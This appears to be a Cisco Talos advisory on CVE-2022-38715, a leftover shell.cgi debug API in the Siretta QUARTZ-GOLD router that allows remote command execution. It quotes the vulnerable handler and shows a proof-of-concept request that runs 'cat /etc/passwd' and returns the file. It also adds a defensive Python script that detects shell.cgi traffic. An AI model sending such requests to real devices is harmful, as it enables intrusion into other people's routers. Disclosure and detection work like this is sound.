CVSS3: 7.2 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: HIGH
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS2: 5.8 Medium
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: MULTIPLE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:M/C:P/I:P/A:P
EPSS: 0.002 Low (Percentile: 51.0%)
CVE-2022-38715
A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
QUARTZ-GOLD - <https://www.siretta.com/products/industrial-routers/4g-lte-router/gigabit-ethernet-small-footprint-lte-router-eu/>
7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-489 - Leftover Debug Code
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as SSH, UPnP, VPN, SNMP and many others.
Based on the router's web pages, its functionality and the publicly available documentation, the QUARTZ-GOLD provides no supported way to access the Linux system running on the router directly. The router's web server is based on AdvancedTomato, which ships with several debug APIs enabled by default, and the developer apparently never disabled them. For instance, AdvancedTomato's shell.cgi API is still active and allows arbitrary command execution:
static void wo_shell(char *url)
{
    /* Opens the JavaScript assignment that will carry the command output. */
    web_puts("\ncmdresult = '");
    /* Runs the request's "command" parameter through the system shell without any
       filtering; WOF_JAVASCRIPT only escapes the output for the JS string
       (hence the \x0a sequences in the response below). */
    _execute_command(NULL, webcgi_get("command"), NULL, WOF_JAVASCRIPT);
    web_puts("';");
}
wo_shell is the function that is called when the shell.cgi API is requested. It calls _execute_command with the request's command parameter, which runs the supplied shell command. This leftover debug code therefore allows arbitrary command execution.
Sending a request like the following:
POST /shell.cgi HTTP/1.1
Authorization: Basic <a>
Content-Length: 52
command=cat /etc/passwd&_http_id=<the correct tid>
generates the following response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 22:01:30 GMT
Content-Type: text/javascript
Cache-Control: no-cache, no-store, must-revalidate, private
Expires: Thu, 31 Dec 1970 00:00:00 GMT
Pragma: no-cache
Connection: close
cmdresult = 'root:x:0:0:root:/root:/bin/sh\x0aadmin:x:0:0:admin:/root:/bin/sh\x0anobody:x:65534:65534:nobody:/dev/null:/dev/null\x0a';
The request makes the router execute the command cat /etc/passwd and return the command's output in the body of the HTTP response.
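As an added example (not part of the Talos advisory and not AdvancedTomato code), the following Python script shows how a defender could flag use of the leftover shell.cgi endpoint in HTTP traffic captured in front of the router (reverse proxy, IDS or packet capture) and recover the command output carried back in the cmdresult JavaScript assignment, which is useful when reconstructing what an attacker ran. The sample request and response are constructed from the advisory above; the endpoint set, the helper names and the assumption that parameters arrive form-encoded are mine.

```python
"""Flag requests to the leftover AdvancedTomato shell.cgi debug API and decode its responses.

Added example; the endpoint set, helper names and the sample traffic below are
constructed for illustration and are not from the advisory or from AdvancedTomato.
"""
import re
from urllib.parse import parse_qs

# Debug CGI endpoints that have no business being reachable on a production router.
# Only shell.cgi is named in the advisory; extend this set as you confirm others.
DEBUG_CGI_PATHS = {"/shell.cgi"}


def _split_message(raw: str):
    """Return (start line, header dict, body) for a raw HTTP request or response."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_request(raw: str):
    """Return a finding dict if the request targets a debug CGI, else None."""
    start, headers, body = _split_message(raw)
    method, target, _version = start.split()
    path, _, query = target.partition("?")
    if path.lower() not in DEBUG_CGI_PATHS:
        return None
    # Assumption: parameters travel in the query string or a form-encoded body,
    # which is what the advisory's request uses.
    params = parse_qs(query)
    params.update(parse_qs(body))
    return {
        "method": method,
        "endpoint": path,
        "command": params.get("command", [None])[0],
        # PR:H in the advisory: the caller is authenticated, so a valid
        # Authorization header does not make the request benign.
        "authenticated": "authorization" in headers,
    }


def _js_unescape(s: str) -> str:
    """Undo the JavaScript string escaping applied to the command output (e.g. \\x0a)."""
    def repl(m):
        esc = m.group(1)
        if esc.startswith("x"):
            return chr(int(esc[1:], 16))
        return {"n": "\n", "r": "\r", "t": "\t"}.get(esc, esc)
    return re.sub(r"\\(x[0-9a-fA-F]{2}|.)", repl, s)


def decode_cmdresult(raw: str):
    """Return the command output carried in a shell.cgi response, or None if absent."""
    _start, _headers, body = _split_message(raw)
    m = re.search(r"cmdresult = '(.*)';", body, re.S)
    return _js_unescape(m.group(1)) if m else None


# Constructed samples modelled on the advisory's request and response.
SAMPLE_SHELL_REQUEST = (
    "POST /shell.cgi HTTP/1.1\r\n"
    "Authorization: Basic <a>\r\n"
    "Content-Length: 52\r\n"
    "\r\n"
    "command=cat /etc/passwd&_http_id=<the correct tid>"
)
SAMPLE_BENIGN_REQUEST = "GET / HTTP/1.1\r\nAuthorization: Basic <a>\r\n\r\n"
SAMPLE_SHELL_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: text/javascript\r\n"
    "\r\n"
    "cmdresult = 'root:x:0:0:root:/root:/bin/sh\\x0aadmin:x:0:0:admin:/root:/bin/sh"
    "\\x0anobody:x:65534:65534:nobody:/dev/null:/dev/null\\x0a';"
)

if __name__ == "__main__":
    print(inspect_request(SAMPLE_SHELL_REQUEST))
    print(inspect_request(SAMPLE_BENIGN_REQUEST))
    print(decode_cmdresult(SAMPLE_SHELL_RESPONSE))
```

Any hit from inspect_request should be treated as an incident regardless of the authenticated flag: shell.cgi is not a management function the product exposes on purpose, so an authenticated call still means either a compromised credential or an operator running ad hoc commands on the device. Until the vendor patch is applied, the same logic can drive a blocking rule on whatever sits in front of the router's web interface.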
2022-10-14 - Initial Vendor Contact
2022-10-20 - Vendor Disclosure
2022-11-24 - Vendor Patch Release
2023-01-26 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.